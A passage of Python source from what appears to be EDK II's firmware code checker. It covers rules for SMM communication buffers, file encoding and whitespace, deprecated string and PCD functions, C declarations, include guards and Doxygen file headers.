correct\" +\r\n \" please add [%s] to exception list\"\r\n % Value,\r\n BelongsToTable=IdentifierTable,\r\n BelongsToItem=Id)\r\n else:\r\n if not EccGlobalData.gException.IsException(\r\n ERROR_SMM_COMM_PARA_CHECK_BUFFER_TYPE, Value):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_SMM_COMM_PARA_CHECK_BUFFER_TYPE,\r\n OtherMsg=\"Please review the buffer type\"\r\n + \"is correct or not. If it is correct\" +\r\n \" please add [%s] to exception list\"\r\n % Value,\r\n BelongsToTable=IdentifierTable,\r\n BelongsToItem=Id)\r\n\r\n\r\n # Not find the value of the parameter\r\n else:\r\n SqlCommand = \"\"\"select ID, Modifier, Name, Value, Model, BelongsToFunction from %s\r\n where Name = '%s' and StartLine < %s order by StartLine DESC\"\"\" \\\r\n % (IdentifierTable, SecondPara, StartLine)\r\n NewRecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n if NewRecordSet:\r\n Value = NewRecordSet[0][1]\r\n if 'AllocatePage' in Value \\\r\n or 'AllocatePool' in Value \\\r\n or 'AllocateRuntimePool' in Value \\\r\n or 'AllocateZeroPool' in Value:\r\n pass\r\n else:\r\n if not EccGlobalData.gException.IsException(\r\n ERROR_SMM_COMM_PARA_CHECK_BUFFER_TYPE, Value):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_SMM_COMM_PARA_CHECK_BUFFER_TYPE,\r\n OtherMsg=\"Please review the buffer type\"\r\n + \"is correct or not. If it is correct\" +\r\n \" please add [%s] to exception list\"\r\n % Value,\r\n BelongsToTable=IdentifierTable,\r\n BelongsToItem=Id)\r\n else:\r\n pass\r\n\r\n # Check UNI files\r\n def UniCheck(self):\r\n if EccGlobalData.gConfig.GeneralCheckUni == '1' or EccGlobalData.gConfig.GeneralCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking whether UNI file is UTF-16 ...\")\r\n SqlCommand = \"\"\"select ID, FullPath, ExtName from File where ExtName like 'uni'\"\"\"\r\n RecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n File = Record[1]\r\n FileIn = open(File, 'rb').read(2)\r\n if FileIn != '\\xff\\xfe':\r\n OtherMsg = \"File %s is not a valid UTF-16 UNI file\" % Record[1]\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_GENERAL_CHECK_UNI, OtherMsg=OtherMsg, BelongsToTable='File', BelongsToItem=Record[0])\r\n\r\n # General Checking\r\n def GeneralCheck(self):\r\n self.GeneralCheckNonAcsii()\r\n self.UniCheck()\r\n self.GeneralCheckNoTab()\r\n self.GeneralCheckLineEnding()\r\n self.GeneralCheckTrailingWhiteSpaceLine()\r\n\r\n # Check whether NO Tab is used, replaced with spaces\r\n def GeneralCheckNoTab(self):\r\n if EccGlobalData.gConfig.GeneralCheckNoTab == '1' or EccGlobalData.gConfig.GeneralCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking No TAB used in file ...\")\r\n SqlCommand = \"\"\"select ID, FullPath, ExtName from File where ExtName in ('.dec', '.inf', '.dsc', 'c', 'h')\"\"\"\r\n RecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n if Record[2].upper() not in EccGlobalData.gConfig.BinaryExtList:\r\n op = open(Record[1]).readlines()\r\n IndexOfLine = 0\r\n for Line in op:\r\n IndexOfLine += 1\r\n IndexOfChar = 0\r\n for Char in Line:\r\n IndexOfChar += 1\r\n if Char == '\\t':\r\n OtherMsg = \"File %s has TAB char at line %s column %s\" % (Record[1], IndexOfLine, IndexOfChar)\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_GENERAL_CHECK_NO_TAB, OtherMsg=OtherMsg, BelongsToTable='File', BelongsToItem=Record[0])\r\n\r\n # Check Only use CRLF (Carriage Return Line Feed) line endings.\r\n def GeneralCheckLineEnding(self):\r\n if EccGlobalData.gConfig.GeneralCheckLineEnding == '1' or EccGlobalData.gConfig.GeneralCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking line ending in file ...\")\r\n SqlCommand = \"\"\"select ID, FullPath, ExtName from File where ExtName in ('.dec', '.inf', '.dsc', 'c', 'h')\"\"\"\r\n RecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n if Record[2].upper() not in EccGlobalData.gConfig.BinaryExtList:\r\n op = open(Record[1], 'rb').readlines()\r\n IndexOfLine = 0\r\n for Line in op:\r\n IndexOfLine += 1\r\n if not bytes.decode(Line).endswith('\\r\\n'):\r\n OtherMsg = \"File %s has invalid line ending at line %s\" % (Record[1], IndexOfLine)\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_GENERAL_CHECK_INVALID_LINE_ENDING, OtherMsg=OtherMsg, BelongsToTable='File', BelongsToItem=Record[0])\r\n\r\n # Check if there is no trailing white space in one line.\r\n def GeneralCheckTrailingWhiteSpaceLine(self):\r\n if EccGlobalData.gConfig.GeneralCheckTrailingWhiteSpaceLine == '1' or EccGlobalData.gConfig.GeneralCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking trailing white space line in file ...\")\r\n SqlCommand = \"\"\"select ID, FullPath, ExtName from File where ExtName in ('.dec', '.inf', '.dsc', 'c', 'h')\"\"\"\r\n RecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n if Record[2].upper() not in EccGlobalData.gConfig.BinaryExtList:\r\n op = open(Record[1], 'r').readlines()\r\n IndexOfLine = 0\r\n for Line in op:\r\n IndexOfLine += 1\r\n if Line.replace('\\r', '').replace('\\n', '').endswith(' '):\r\n OtherMsg = \"File %s has trailing white spaces at line %s\" % (Record[1], IndexOfLine)\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_GENERAL_CHECK_TRAILING_WHITE_SPACE_LINE, OtherMsg=OtherMsg, BelongsToTable='File', BelongsToItem=Record[0])\r\n\r\n # Check whether file has non ACSII char\r\n def GeneralCheckNonAcsii(self):\r\n if EccGlobalData.gConfig.GeneralCheckNonAcsii == '1' or EccGlobalData.gConfig.GeneralCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking Non-ACSII char in file ...\")\r\n SqlCommand = \"\"\"select ID, FullPath, ExtName from File where ExtName in ('.dec', '.inf', '.dsc', 'c', 'h')\"\"\"\r\n RecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n if Record[2].upper() not in EccGlobalData.gConfig.BinaryExtList:\r\n op = open(Record[1]).readlines()\r\n IndexOfLine = 0\r\n for Line in op:\r\n IndexOfLine += 1\r\n IndexOfChar = 0\r\n for Char in Line:\r\n IndexOfChar += 1\r\n if ord(Char) > 126:\r\n OtherMsg = \"File %s has Non-ASCII char at line %s column %s\" % (Record[1], IndexOfLine, IndexOfChar)\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_GENERAL_CHECK_NON_ACSII, OtherMsg=OtherMsg, BelongsToTable='File', BelongsToItem=Record[0])\r\n\r\n # C Function Layout Checking\r\n def FunctionLayoutCheck(self):\r\n self.FunctionLayoutCheckReturnType()\r\n self.FunctionLayoutCheckModifier()\r\n self.FunctionLayoutCheckName()\r\n self.FunctionLayoutCheckPrototype()\r\n self.FunctionLayoutCheckBody()\r\n self.FunctionLayoutCheckLocalVariable()\r\n self.FunctionLayoutCheckDeprecated()\r\n\r\n # To check if the deprecated functions are used\r\n def FunctionLayoutCheckDeprecated(self):\r\n if EccGlobalData.gConfig.CFunctionLayoutCheckNoDeprecated == '1' or EccGlobalData.gConfig.CFunctionLayoutCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking function no deprecated one being used ...\")\r\n\r\n DeprecatedFunctionSet = ('UnicodeValueToString',\r\n 'AsciiValueToString',\r\n 'StrCpy',\r\n 'StrnCpy',\r\n 'StrCat',\r\n 'StrnCat',\r\n 'UnicodeStrToAsciiStr',\r\n 'AsciiStrCpy',\r\n 'AsciiStrnCpy',\r\n 'AsciiStrCat',\r\n 'AsciiStrnCat',\r\n 'AsciiStrToUnicodeStr',\r\n 'PcdSet8',\r\n 'PcdSet16',\r\n 'PcdSet32',\r\n 'PcdSet64',\r\n 'PcdSetPtr',\r\n 'PcdSetBool',\r\n 'PcdSetEx8',\r\n 'PcdSetEx16',\r\n 'PcdSetEx32',\r\n 'PcdSetEx64',\r\n 'PcdSetExPtr',\r\n 'PcdSetExBool',\r\n 'LibPcdSet8',\r\n 'LibPcdSet16',\r\n 'LibPcdSet32',\r\n 'LibPcdSet64',\r\n 'LibPcdSetPtr',\r\n 'LibPcdSetBool',\r\n 'LibPcdSetEx8',\r\n 'LibPcdSetEx16',\r\n 'LibPcdSetEx32',\r\n 'LibPcdSetEx64',\r\n 'LibPcdSetExPtr',\r\n 'LibPcdSetExBool',\r\n 'GetVariable',\r\n 'GetEfiGlobalVariable',\r\n )\r\n\r\n for IdentifierTable in EccGlobalData.gIdentifierTableList:\r\n SqlCommand = \"\"\"select ID, Name, BelongsToFile from %s\r\n where Model = %s \"\"\" % (IdentifierTable, MODEL_IDENTIFIER_FUNCTION_CALLING)\r\n RecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n for Key in DeprecatedFunctionSet:\r\n if Key == Record[1]:\r\n if not EccGlobalData.gException.IsException(ERROR_C_FUNCTION_LAYOUT_CHECK_NO_DEPRECATE, Key):\r\n OtherMsg = 'The function [%s] is deprecated which should NOT be used' % Key\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_C_FUNCTION_LAYOUT_CHECK_NO_DEPRECATE,\r\n OtherMsg=OtherMsg,\r\n BelongsToTable=IdentifierTable,\r\n BelongsToItem=Record[0])\r\n\r\n def WalkTree(self):\r\n IgnoredPattern = c.GetIgnoredDirListPattern()\r\n for Dirpath, Dirnames, Filenames in os.walk(EccGlobalData.gTarget):\r\n for Dir in Dirnames:\r\n Dirname = os.path.join(Dirpath, Dir)\r\n if os.path.islink(Dirname):\r\n Dirname = os.path.realpath(Dirname)\r\n if os.path.isdir(Dirname):\r\n # symlinks to directories are treated as directories\r\n Dirnames.remove(Dir)\r\n Dirnames.append(Dirname)\r\n if IgnoredPattern.match(Dirpath.upper()):\r\n continue\r\n for f in Filenames[:]:\r\n if f.lower() in EccGlobalData.gConfig.SkipFileList:\r\n Filenames.remove(f)\r\n yield (Dirpath, Dirnames, Filenames)\r\n\r\n # Check whether return type exists and in the first line\r\n def FunctionLayoutCheckReturnType(self):\r\n if EccGlobalData.gConfig.CFunctionLayoutCheckReturnType == '1' or EccGlobalData.gConfig.CFunctionLayoutCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking function layout return type ...\")\r\n\r\n# for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n# for F in Filenames:\r\n# if os.path.splitext(F)[1] in ('.c', '.h'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# c.CheckFuncLayoutReturnType(FullName)\r\n for FullName in EccGlobalData.gCFileList + EccGlobalData.gHFileList:\r\n c.CheckFuncLayoutReturnType(FullName)\r\n\r\n # Check whether any optional functional modifiers exist and next to the return type\r\n def FunctionLayoutCheckModifier(self):\r\n if EccGlobalData.gConfig.CFunctionLayoutCheckOptionalFunctionalModifier == '1' or EccGlobalData.gConfig.CFunctionLayoutCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking function layout modifier ...\")\r\n\r\n# for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n# for F in Filenames:\r\n# if os.path.splitext(F)[1] in ('.c', '.h'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# c.CheckFuncLayoutModifier(FullName)\r\n for FullName in EccGlobalData.gCFileList + EccGlobalData.gHFileList:\r\n c.CheckFuncLayoutModifier(FullName)\r\n\r\n # Check whether the next line contains the function name, left justified, followed by the beginning of the parameter list\r\n # Check whether the closing parenthesis is on its own line and also indented two spaces\r\n def FunctionLayoutCheckName(self):\r\n if EccGlobalData.gConfig.CFunctionLayoutCheckFunctionName == '1' or EccGlobalData.gConfig.CFunctionLayoutCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking function layout function name ...\")\r\n\r\n# for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n# for F in Filenames:\r\n# if os.path.splitext(F)[1] in ('.c', '.h'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# c.CheckFuncLayoutName(FullName)\r\n for FullName in EccGlobalData.gCFileList + EccGlobalData.gHFileList:\r\n c.CheckFuncLayoutName(FullName)\r\n\r\n # Check whether the function prototypes in include files have the same form as function definitions\r\n def FunctionLayoutCheckPrototype(self):\r\n if EccGlobalData.gConfig.CFunctionLayoutCheckFunctionPrototype == '1' or EccGlobalData.gConfig.CFunctionLayoutCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking function layout function prototype ...\")\r\n\r\n# for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n# for F in Filenames:\r\n# if os.path.splitext(F)[1] in ('.c'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# EdkLogger.quiet(\"[PROTOTYPE]\" + FullName)\r\n# c.CheckFuncLayoutPrototype(FullName)\r\n for FullName in EccGlobalData.gCFileList:\r\n EdkLogger.quiet(\"[PROTOTYPE]\" + FullName)\r\n c.CheckFuncLayoutPrototype(FullName)\r\n\r\n # Check whether the body of a function is contained by open and close braces that must be in the first column\r\n def FunctionLayoutCheckBody(self):\r\n if EccGlobalData.gConfig.CFunctionLayoutCheckFunctionBody == '1' or EccGlobalData.gConfig.CFunctionLayoutCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking function layout function body ...\")\r\n\r\n# for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n# for F in Filenames:\r\n# if os.path.splitext(F)[1] in ('.c'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# c.CheckFuncLayoutBody(FullName)\r\n for FullName in EccGlobalData.gCFileList:\r\n c.CheckFuncLayoutBody(FullName)\r\n\r\n # Check whether the data declarations is the first code in a module.\r\n # self.CFunctionLayoutCheckDataDeclaration = 1\r\n # Check whether no initialization of a variable as part of its declaration\r\n def FunctionLayoutCheckLocalVariable(self):\r\n if EccGlobalData.gConfig.CFunctionLayoutCheckNoInitOfVariable == '1' or EccGlobalData.gConfig.CFunctionLayoutCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking function layout local variables ...\")\r\n\r\n# for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n# for F in Filenames:\r\n# if os.path.splitext(F)[1] in ('.c'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# c.CheckFuncLayoutLocalVariable(FullName)\r\n\r\n for FullName in EccGlobalData.gCFileList:\r\n c.CheckFuncLayoutLocalVariable(FullName)\r\n\r\n # Check whether no use of STATIC for functions\r\n # self.CFunctionLayoutCheckNoStatic = 1\r\n\r\n # Declarations and Data Types Checking\r\n def DeclAndDataTypeCheck(self):\r\n self.DeclCheckNoUseCType()\r\n self.DeclCheckInOutModifier()\r\n self.DeclCheckEFIAPIModifier()\r\n self.DeclCheckEnumeratedType()\r\n self.DeclCheckStructureDeclaration()\r\n self.DeclCheckSameStructure()\r\n self.DeclCheckUnionType()\r\n\r\n\r\n # Check whether no use of int, unsigned, char, void, long in any .c, .h or .asl files.\r\n def DeclCheckNoUseCType(self):\r\n if EccGlobalData.gConfig.DeclarationDataTypeCheckNoUseCType == '1' or EccGlobalData.gConfig.DeclarationDataTypeCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking Declaration No use C type ...\")\r\n\r\n# for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n# for F in Filenames:\r\n# if os.path.splitext(F)[1] in ('.h', '.c'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# c.CheckDeclNoUseCType(FullName)\r\n for FullName in EccGlobalData.gCFileList + EccGlobalData.gHFileList:\r\n c.CheckDeclNoUseCType(FullName)\r\n\r\n # Check whether the modifiers IN, OUT, OPTIONAL, and UNALIGNED are used only to qualify arguments to a function and should not appear in a data type declaration\r\n def DeclCheckInOutModifier(self):\r\n if EccGlobalData.gConfig.DeclarationDataTypeCheckInOutModifier == '1' or EccGlobalData.gConfig.DeclarationDataTypeCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking Declaration argument modifier ...\")\r\n\r\n# for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n# for F in Filenames:\r\n# if os.path.splitext(F)[1] in ('.h', '.c'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# c.CheckDeclArgModifier(FullName)\r\n for FullName in EccGlobalData.gCFileList + EccGlobalData.gHFileList:\r\n c.CheckDeclArgModifier(FullName)\r\n\r\n # Check whether the EFIAPI modifier should be used at the entry of drivers, events, and member functions of protocols\r\n def DeclCheckEFIAPIModifier(self):\r\n if EccGlobalData.gConfig.DeclarationDataTypeCheckEFIAPIModifier == '1' or EccGlobalData.gConfig.DeclarationDataTypeCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n pass\r\n\r\n # Check whether Enumerated Type has a 'typedef' and the name is capital\r\n def DeclCheckEnumeratedType(self):\r\n if EccGlobalData.gConfig.DeclarationDataTypeCheckEnumeratedType == '1' or EccGlobalData.gConfig.DeclarationDataTypeCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking Declaration enum typedef ...\")\r\n\r\n# for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n# for F in Filenames:\r\n# if os.path.splitext(F)[1] in ('.h', '.c'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# EdkLogger.quiet(\"[ENUM]\" + FullName)\r\n# c.CheckDeclEnumTypedef(FullName)\r\n for FullName in EccGlobalData.gCFileList + EccGlobalData.gHFileList:\r\n EdkLogger.quiet(\"[ENUM]\" + FullName)\r\n c.CheckDeclEnumTypedef(FullName)\r\n\r\n # Check whether Structure Type has a 'typedef' and the name is capital\r\n def DeclCheckStructureDeclaration(self):\r\n if EccGlobalData.gConfig.DeclarationDataTypeCheckStructureDeclaration == '1' or EccGlobalData.gConfig.DeclarationDataTypeCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking Declaration struct typedef ...\")\r\n\r\n# for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n# for F in Filenames:\r\n# if os.path.splitext(F)[1] in ('.h', '.c'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# EdkLogger.quiet(\"[STRUCT]\" + FullName)\r\n# c.CheckDeclStructTypedef(FullName)\r\n for FullName in EccGlobalData.gCFileList + EccGlobalData.gHFileList:\r\n EdkLogger.quiet(\"[STRUCT]\" + FullName)\r\n c.CheckDeclStructTypedef(FullName)\r\n\r\n # Check whether having same Structure\r\n def DeclCheckSameStructure(self):\r\n if EccGlobalData.gConfig.DeclarationDataTypeCheckSameStructure == '1' or EccGlobalData.gConfig.DeclarationDataTypeCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking same struct ...\")\r\n AllStructure = {}\r\n for IdentifierTable in EccGlobalData.gIdentifierTableList:\r\n SqlCommand = \"\"\"select ID, Name, BelongsToFile from %s where Model = %s\"\"\" % (IdentifierTable, MODEL_IDENTIFIER_STRUCTURE)\r\n RecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n if Record[1] != '':\r\n if Record[1] not in AllStructure.keys():\r\n AllStructure[Record[1]] = Record[2]\r\n else:\r\n ID = AllStructure[Record[1]]\r\n SqlCommand = \"\"\"select FullPath from File where ID = %s \"\"\" % ID\r\n NewRecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n OtherMsg = \"The structure name '%s' is duplicate\" % Record[1]\r\n if NewRecordSet != []:\r\n OtherMsg = \"The structure name [%s] is duplicate with the one defined in %s, maybe struct NOT typedefed or the typedef new type NOT used to qualify variables\" % (Record[1], NewRecordSet[0][0])\r\n if not EccGlobalData.gException.IsException(ERROR_DECLARATION_DATA_TYPE_CHECK_SAME_STRUCTURE, Record[1]):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_DECLARATION_DATA_TYPE_CHECK_SAME_STRUCTURE, OtherMsg=OtherMsg, BelongsToTable=IdentifierTable, BelongsToItem=Record[0])\r\n\r\n # Check whether Union Type has a 'typedef' and the name is capital\r\n def DeclCheckUnionType(self):\r\n if EccGlobalData.gConfig.DeclarationDataTypeCheckUnionType == '1' or EccGlobalData.gConfig.DeclarationDataTypeCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking Declaration union typedef ...\")\r\n\r\n# for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n# for F in Filenames:\r\n# if os.path.splitext(F)[1] in ('.h', '.c'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# EdkLogger.quiet(\"[UNION]\" + FullName)\r\n# c.CheckDeclUnionTypedef(FullName)\r\n for FullName in EccGlobalData.gCFileList + EccGlobalData.gHFileList:\r\n EdkLogger.quiet(\"[UNION]\" + FullName)\r\n c.CheckDeclUnionTypedef(FullName)\r\n\r\n # Predicate Expression Checking\r\n def PredicateExpressionCheck(self):\r\n self.PredicateExpressionCheckBooleanValue()\r\n self.PredicateExpressionCheckNonBooleanOperator()\r\n self.PredicateExpressionCheckComparisonNullType()\r\n\r\n # Check whether Boolean values, variable type BOOLEAN not use explicit comparisons to TRUE or FALSE\r\n def PredicateExpressionCheckBooleanValue(self):\r\n if EccGlobalData.gConfig.PredicateExpressionCheckBooleanValue == '1' or EccGlobalData.gConfig.PredicateExpressionCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking predicate expression Boolean value ...\")\r\n\r\n# for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n# for F in Filenames:\r\n# if os.path.splitext(F)[1] in ('.c'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# EdkLogger.quiet(\"[BOOLEAN]\" + FullName)\r\n# c.CheckBooleanValueComparison(FullName)\r\n for FullName in EccGlobalData.gCFileList:\r\n EdkLogger.quiet(\"[BOOLEAN]\" + FullName)\r\n c.CheckBooleanValueComparison(FullName)\r\n\r\n # Check whether Non-Boolean comparisons use a compare operator (==, !=, >, < >=, <=).\r\n def PredicateExpressionCheckNonBooleanOperator(self):\r\n if EccGlobalData.gConfig.PredicateExpressionCheckNonBooleanOperator == '1' or EccGlobalData.gConfig.PredicateExpressionCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking predicate expression Non-Boolean variable...\")\r\n\r\n# for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n# for F in Filenames:\r\n# if os.path.splitext(F)[1] in ('.c'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# EdkLogger.quiet(\"[NON-BOOLEAN]\" + FullName)\r\n# c.CheckNonBooleanValueComparison(FullName)\r\n for FullName in EccGlobalData.gCFileList:\r\n EdkLogger.quiet(\"[NON-BOOLEAN]\" + FullName)\r\n c.CheckNonBooleanValueComparison(FullName)\r\n\r\n # Check whether a comparison of any pointer to zero must be done via the NULL type\r\n def PredicateExpressionCheckComparisonNullType(self):\r\n if EccGlobalData.gConfig.PredicateExpressionCheckComparisonNullType == '1' or EccGlobalData.gConfig.PredicateExpressionCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking predicate expression NULL pointer ...\")\r\n\r\n# for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n# for F in Filenames:\r\n# if os.path.splitext(F)[1] in ('.c'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# EdkLogger.quiet(\"[POINTER]\" + FullName)\r\n# c.CheckPointerNullComparison(FullName)\r\n for FullName in EccGlobalData.gCFileList:\r\n EdkLogger.quiet(\"[POINTER]\" + FullName)\r\n c.CheckPointerNullComparison(FullName)\r\n\r\n # Include file checking\r\n def IncludeFileCheck(self):\r\n self.IncludeFileCheckIfndef()\r\n self.IncludeFileCheckData()\r\n self.IncludeFileCheckSameName()\r\n\r\n # Check whether having include files with same name\r\n def IncludeFileCheckSameName(self):\r\n if EccGlobalData.gConfig.IncludeFileCheckSameName == '1' or EccGlobalData.gConfig.IncludeFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking same header file name ...\")\r\n SqlCommand = \"\"\"select ID, FullPath from File\r\n where Model = 1002 order by Name \"\"\"\r\n RecordDict = {}\r\n RecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n List = Record[1].replace('/', '\\\\').split('\\\\')\r\n if len(List) >= 2:\r\n Key = List[-2] + '\\\\' + List[-1]\r\n else:\r\n Key = List[0]\r\n if Key not in RecordDict:\r\n RecordDict[Key] = [Record]\r\n else:\r\n RecordDict[Key].append(Record)\r\n\r\n for Key in RecordDict:\r\n if len(RecordDict[Key]) > 1:\r\n for Item in RecordDict[Key]:\r\n Path = mws.relpath(Item[1], EccGlobalData.gWorkspace)\r\n if not EccGlobalData.gException.IsException(ERROR_INCLUDE_FILE_CHECK_NAME, Path):\r\n EccGlobalData.gDb.TblReport.Insert(ERROR_INCLUDE_FILE_CHECK_NAME, OtherMsg=\"The file name for [%s] is duplicate\" % Path, BelongsToTable='File', BelongsToItem=Item[0])\r\n\r\n # Check whether all include file contents is guarded by a #ifndef statement.\r\n def IncludeFileCheckIfndef(self):\r\n if EccGlobalData.gConfig.IncludeFileCheckIfndefStatement == '1' or EccGlobalData.gConfig.IncludeFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking header file ifndef ...\")\r\n\r\n# for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n# for F in Filenames:\r\n# if os.path.splitext(F)[1] in ('.h'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# MsgList = c.CheckHeaderFileIfndef(FullName)\r\n for FullName in EccGlobalData.gHFileList:\r\n MsgList = c.CheckHeaderFileIfndef(FullName)\r\n\r\n # Check whether include files NOT contain code or define data variables\r\n def IncludeFileCheckData(self):\r\n if EccGlobalData.gConfig.IncludeFileCheckData == '1' or EccGlobalData.gConfig.IncludeFileCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking header file data ...\")\r\n\r\n # Get all typedef functions\r\n gAllTypedefFun = []\r\n for IdentifierTable in EccGlobalData.gIdentifierTableList:\r\n SqlCommand = \"\"\"select Name from %s\r\n where Model = %s \"\"\" % (IdentifierTable, MODEL_IDENTIFIER_TYPEDEF)\r\n RecordSet = EccGlobalData.gDb.TblFile.Exec(SqlCommand)\r\n for Record in RecordSet:\r\n if Record[0].startswith('('):\r\n gAllTypedefFun.append(Record[0])\r\n\r\n# for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n# for F in Filenames:\r\n# if os.path.splitext(F)[1] in ('.h'):\r\n# FullName = os.path.join(Dirpath, F)\r\n# MsgList = c.CheckHeaderFileData(FullName)\r\n for FullName in EccGlobalData.gHFileList:\r\n MsgList = c.CheckHeaderFileData(FullName, gAllTypedefFun)\r\n\r\n # Doxygen document checking\r\n def DoxygenCheck(self):\r\n self.DoxygenCheckFileHeader()\r\n self.DoxygenCheckFunctionHeader()\r\n self.DoxygenCheckCommentDescription()\r\n self.DoxygenCheckCommentFormat()\r\n self.DoxygenCheckCommand()\r\n\r\n # Check whether the file headers are followed Doxygen special documentation blocks in section 2.3.5\r\n def DoxygenCheckFileHeader(self):\r\n if EccGlobalData.gConfig.DoxygenCheckFileHeader == '1' or EccGlobalData.gConfig.DoxygenCheckAll == '1' or EccGlobalData.gConfig.CheckAll == '1':\r\n EdkLogger.quiet(\"Checking Doxygen file header ...\")\r\n\r\n for Dirpath, Dirnames, Filenames in self.WalkTree():\r\n for F in Filenames:\r\n Ext = os.path.splitext(F)[1]\r\n if Ext in ('.h', '.c'):\r\n FullName = os.path.join(Dirpath, F)\r\n MsgList = c.CheckFileHeaderDoxygenComments(FullName)\r\n elif Ext in ('.inf', '.dec', '.dsc', '.fdf'):\r\n FullName = os.path.join(Dirpath, F)\r\n op = open(FullName).readlines()\r\n FileLinesList = op\r\n LineNo = 0\r\n CurrentSection = MODEL_UNKNOWN\r\n HeaderSectionLines = []\r\n HeaderCommentStart = False\r\n HeaderCommentEnd = False\r\n\r\n for Line in FileLinesList:\r\n LineNo = LineNo + 1\r\n Line = Line.strip()\r\n if (LineNo < len(FileLinesList) - 1):\r\n NextLine = FileLinesList[LineNo].strip()\r\n\r\n #\r\n # blank line\r\n #\r\n if (Line == '' or not Line) and LineNo == len(FileLinesList):\r\n LastSectionFalg = True\r\n\r\n #\r\n # check whether file header comment section started\r\n #\r\n if Line.startswith('#') and \\\r\n (Line.find('@file') > -1) and \\\r\n not HeaderCommentStart:\r\n if CurrentSection != MODEL_UNKNOWN:\r\n SqlStatement = \"\"\" select ID from File where FullPath like '%s'\"\"\" % FullName\r\n ResultSet = EccGlobalData.gDb.TblFile.Exec(SqlStatement)\r\n for Result in ResultSet:\r\n Msg = 